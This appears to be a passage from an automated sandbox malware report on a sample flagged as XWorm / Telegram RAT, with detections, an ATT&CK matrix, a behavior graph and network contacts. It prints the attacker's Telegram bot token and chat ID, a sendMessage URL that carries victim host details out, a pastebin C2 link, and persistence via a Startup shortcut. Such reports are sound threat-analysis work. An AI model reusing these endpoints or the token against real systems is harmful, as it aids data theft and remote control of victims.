                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Users\user\Desktop\2QaN4hOyJs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected Telegram RAT
                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 2QaN4hOyJs.exe PID: 7544, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
                                    Yara detected XWorm
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 2QaN4hOyJs.exe PID: 7544, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected Telegram RAT
                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 2QaN4hOyJs.exe PID: 7544, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED
                                    Yara detected XWorm
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: 2QaN4hOyJs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.2QaN4hOyJs.exe.e40000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.2QaN4hOyJs.exe.131a1a78.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1332506285.0000000000E42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2615632586.0000000013191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: 2QaN4hOyJs.exe PID: 7544, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\System, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                                    Windows Management Instrumentation                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		1
                                    Input Capture                                    		1
                                    File and Directory Discovery                                    		Remote Services11
                                    Archive Collected Data                                    		2
                                    Web Service                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    PowerShell                                    		2
                                    Registry Run Keys / Startup Folder                                    		11
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory23
                                    System Information Discovery                                    		Remote Desktop Protocol1
                                    Input Capture                                    		3
                                    Ingress Tool Transfer                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                                    Registry Run Keys / Startup Folder                                    		11
                                    Obfuscated Files or Information                                    		Security Account Manager521
                                    Security Software Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		11
                                    Encrypted Channel                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                                    Software Packing                                    		NTDS1
                                    Process Discovery                                    		Distributed Component Object ModelInput Capture3
                                    Non-Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets151
                                    Virtualization/Sandbox Evasion                                    		SSHKeylogging14
                                    Application Layer Protocol                                    		Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                    Masquerading                                    		Cached Domain Credentials1
                                    Application Window Discovery                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                                    Virtualization/Sandbox Evasion                                    		DCSync1
                                    System Network Configuration Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                    Process Injection                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579078 Sample: 2QaN4hOyJs.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 32 pastebin.com 2->32 34 api.telegram.org 2->34 36 2 other IPs or domains 2->36 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 54 21 other signatures 2->54 8 2QaN4hOyJs.exe 14 5 2->8         started        signatures3 50 Connects to a pastebin service (likely for C&C) 32->50 52 Uses the Telegram API (likely for C&C communication) 34->52 process4 dnsIp5 38 ip-api.com 208.95.112.1, 49717, 80 TUT-ASUS United States 8->38 40 api.telegram.org 149.154.167.220, 443, 49854 TELEGRAMRU United Kingdom 8->40 42 pastebin.com 104.20.3.235, 443, 49849 CLOUDFLARENETUS United States 8->42 30 C:\Users\user\AppData\Local\Temp\System, PE32 8->30 dropped 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->56 58 Protects its processes via BreakOnTermination flag 8->58 60 Bypasses PowerShell execution policy 8->60 62 3 other signatures 8->62 13 powershell.exe 23 8->13         started        16 powershell.exe 23 8->16         started        18 powershell.exe 23 8->18         started        20 powershell.exe 8->20         started        file6 signatures7 process8 signatures9 64 Loading BitLocker PowerShell Module 13->64 22 conhost.exe 13->22         started        24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        process10

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    2QaN4hOyJs.exe82%ReversingLabsWin32.Exploit.Xworm
                                    2QaN4hOyJs.exe100%AviraTR/Spy.Gen
                                    2QaN4hOyJs.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\System100%AviraTR/Spy.Gen
                                    C:\Users\user\AppData\Local\Temp\System100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Temp\System82%ReversingLabsWin32.Exploit.Xworm

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    No Antivirus matches

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    ip-api.com
                                    		208.95.112.1
                                    		truefalse
                                      		high
                                      s-part-0035.t-0009.t-msedge.net
                                      		13.107.246.63
                                      		truefalse
                                        		high
                                        api.telegram.org
                                        		149.154.167.220
                                        		truefalse
                                          		high
                                          pastebin.com
                                          		104.20.3.235
                                          		truefalse
                                            		high
                                            Brian123121-27796.portmap.io
                                            		unknown
                                            		unknowntrue
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              https://pastebin.com/raw/4X62dQQ8false
                                                		high
                                                https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=7705511583&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4AB9DA9F1C2993F263A7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%205BNYU1CK1%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20Systemfalse
                                                  		high
                                                  http://ip-api.com/line/?fields=hostingfalse
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1444776853.000001D0E9413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541139414.000001FE90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1688930369.0000024B11E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.microsoft.coLpowershell.exe, 0000000C.00000002.1926579498.000002B861950000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://api.telegram.org2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.telegram.org/bot2QaN4hOyJs.exe, System.0.drfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1422516094.000001D0D95C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.telegram.org/bot7803481908:AAFRJ7hGTHr7dVyXQ9pw_CE-Cb3xegvn5GY/sendMessage?chat_id=770552QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000031E5000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, 2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/Licensepowershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.micpowershell.exe, 00000005.00000002.1556486342.000001FEF5663000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/Iconpowershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crl.mpowershell.exe, 00000005.00000002.1559162610.000001FEF5C34000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1923662075.000002B8618B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.microsoft.coipowershell.exe, 00000005.00000002.1559162610.000001FEF5CC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1422516094.000001D0D95C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01FE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8495F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://contoso.com/powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1444776853.000001D0E9413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1541139414.000001FE90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1688930369.0000024B11E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1897793175.000002B85943F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://crl.microsmpowershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://api.telegrP2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crl.micft.cMicRosofpowershell.exe, 00000005.00000002.1556486342.000001FEF5663000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1925371278.000002B861924000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://aka.ms/pscore68powershell.exe, 00000002.00000002.1422516094.000001D0D93A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8493D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://api.telegram.org2QaN4hOyJs.exe, 00000000.00000002.2609307176.00000000032F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name2QaN4hOyJs.exe, 00000000.00000002.2609307176.0000000003191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1422516094.000001D0D93A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1474073745.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1605210010.0000024B01DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1749492111.000002B8493D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.microsoft.coFApowershell.exe, 0000000C.00000002.1923414066.000002B861888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    104.20.3.235
                                                                                                    		pastebin.comUnited States
                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                    208.95.112.1
                                                                                                    		ip-api.comUnited States
                                                                                                    		53334TUT-ASUSfalse
                                                                                                    149.154.167.220
                                                                                                    		api.telegram.orgUnited Kingdom
                                                                                                    		62041TELEGRAMRUfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1579078
                                                                                                    Start date and time:2024-12-20 19:13:08 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 6m 36s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:17
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:2QaN4hOyJs.exe
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:712ab1b048b49449d00e124e577e7eabe732252e0ba9ce3cead7eaf46f44903e.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@13/19@13/3
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 20%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 99%
                                                                                                    • Number of executed functions: 51
                                                                                                    • Number of non-executed functions: 9
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 23.206.229.209
                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 2976 because it is empty
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7404 because it is empty
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7724 because it is empty
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7988 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                    • VT rate limit hit for: 2QaN4hOyJs.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    13:14:04API Interceptor57x Sleep call for process: powershell.exe modified
                                                                                                    13:15:00API Interceptor41960x Sleep call for process: 2QaN4hOyJs.exe modified
                                                                                                    13:15:00AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    104.20.3.235cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    gabe.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    sostener.vbsGet hashmaliciousNjratBrowse
                                                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                                                    208.95.112.1fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                    • ip-api.com/line/?fields=hosting
                                                                                                    WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                    • ip-api.com/json

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    ip-api.comfvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • 208.95.112.1
                                                                                                    DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 208.95.112.1
                                                                                                    dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                    • 208.95.112.1
                                                                                                    pastebin.combad.txtGet hashmaliciousAsyncRATBrowse
                                                                                                    • 104.20.3.235
                                                                                                    dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                    • 104.20.4.235
                                                                                                    htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 104.20.4.235
                                                                                                    c2.exeGet hashmaliciousXmrigBrowse
                                                                                                    • 104.20.4.235
                                                                                                    Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.19.24
                                                                                                    RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                    • 104.20.4.235
                                                                                                    file.exeGet hashmaliciousXWormBrowse
                                                                                                    • 172.67.19.24
                                                                                                    main.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 104.20.4.235
                                                                                                    CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                    • 104.20.4.235
                                                                                                    http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                    • 172.67.19.24
                                                                                                    s-part-0035.t-0009.t-msedge.netWwVs3PavPg.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.63
                                                                                                    Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.63
                                                                                                    http://www.eventcreate.com/e/you-have-received-a-new-docGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 13.107.246.63
                                                                                                    gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                    • 13.107.246.63
                                                                                                    zSmMqGGeVy.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.63
                                                                                                    2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.63
                                                                                                    VajVW1leCd.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.63
                                                                                                    7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 13.107.246.63
                                                                                                    m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 13.107.246.63
                                                                                                    16ebsersuX.exeGet hashmaliciousCryptbotBrowse
